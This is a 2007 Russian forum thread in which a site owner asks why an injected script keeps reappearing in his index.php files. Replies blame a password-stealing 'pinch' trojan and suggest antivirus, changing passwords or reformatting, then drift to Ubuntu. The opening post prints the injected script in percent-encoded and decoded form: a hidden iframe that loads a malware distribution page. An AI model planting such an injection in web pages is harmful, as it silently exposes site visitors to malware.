Привет всем. Значит проблема такая:
Во всех файлах с названием index.php вдруг появляются такие строки-
"<script>document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%75%70%64%61%74%65%7a%2e%69%6e%66%6f%2f%65%74%63%2f%74%64%73%2e%70%68%70%22%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6f%6e%4c%6f%61%64%3d%22%73%74%61%74%75%73%3d%64%65%66%61%75%6c%74%53%74%61%74%75%73%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e'));</script>".
Расшифрованый код: "<iframe src="http://updatez.info/etc/tds.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>".
Я никак не могу понять, откуда берутся эти строки. Этот код загружает вредоносное ПО!
Я уже устал удалять этот код из всех файлов index.php, а их у меня очень много.
Может кто знает, как избавиться от этого кода?
1. Silus - 10 Декабря, 2007 - 21:01:25 - перейти к сообщению
2. Staind - 10 Декабря, 2007 - 21:21:22 - перейти к сообщению
2Silus, во-первых: НЕ ПИШИТЕ ДЛИННЮЩИЕ ССЫЛКИ.
Это раз. По поводу вашей проблемы:
У вас на компьютере пинч (вредоносная прога, похожая на вирус), которая ворует ваши сохраненные пароли от фтп (и не только, это только малая часть того, что она может). У вас же наверняка есть менеджер ftp и там ТОЧНО сохранен пароль (если память плохая - храните в txt файле). Удалите его просто, и каждый раз, когда нужно войти - пишите его заного. И трабл у вас не будет.
P.s. Такая же проблема была у меня давным давно.
P.s.s. Если хотите избавится от пинча, то придется искать крутой антивирусник (NOD32 последняя версия по моему берет) или format c
Это раз. По поводу вашей проблемы:
У вас на компьютере пинч (вредоносная прога, похожая на вирус), которая ворует ваши сохраненные пароли от фтп (и не только, это только малая часть того, что она может). У вас же наверняка есть менеджер ftp и там ТОЧНО сохранен пароль (если память плохая - храните в txt файле). Удалите его просто, и каждый раз, когда нужно войти - пишите его заного. И трабл у вас не будет.
P.s. Такая же проблема была у меня давным давно.
P.s.s. Если хотите избавится от пинча, то придется искать крутой антивирусник (NOD32 последняя версия по моему берет) или format c
3. Devoll - 10 Декабря, 2007 - 22:19:24 - перейти к сообщению
Формат C нажеднее 
4. Silus - 10 Декабря, 2007 - 22:36:20 - перейти к сообщению
Вообщем нашел я этот пинч (windowsupdater.exe), удалил его, поменял все пароли...
Если не поможет, тогда точно Format C:\
Если не поможет, тогда точно Format C:\
5. Staind - 10 Декабря, 2007 - 22:40:57 - перейти к сообщению
Дааа... круто она себя замаскировала ))
2Devoll, я иногда балуюсь удалением виндой, иногда охото просто взять и начать жизнь с "чистого и протертого окна"))
))2Devoll, я иногда балуюсь удалением виндой, иногда охото просто взять и начать жизнь с "чистого и протертого окна"
))
6. Devoll - 10 Декабря, 2007 - 23:07:13 - перейти к сообщению
Staind поддерживаю полность. Но я больше себя терраризирую. Я частенько ставлю себе Ubuntu, но каждый раз понимаю, что дрова для принтера мне под нее не найти и приходиться переставлять снова
7. Staind - 10 Декабря, 2007 - 23:11:47 - перейти к сообщению
)))А Ubuntu же бесплатная? Можешь дать линк, может как-нибудь установлю.
P.s. Сорри за флуд
8. Devoll - 10 Декабря, 2007 - 23:16:59 - перейти к сообщению
http://www[dot]ubuntu[dot]ru - Linux-дистиб. На мой взгляд один из самых дружелюбных по отношению к пользователю. Работал практически со всеми известными дистрибами.
9. Staind - 10 Декабря, 2007 - 23:44:34 - перейти к сообщению
Хорошо, спасибо за линк.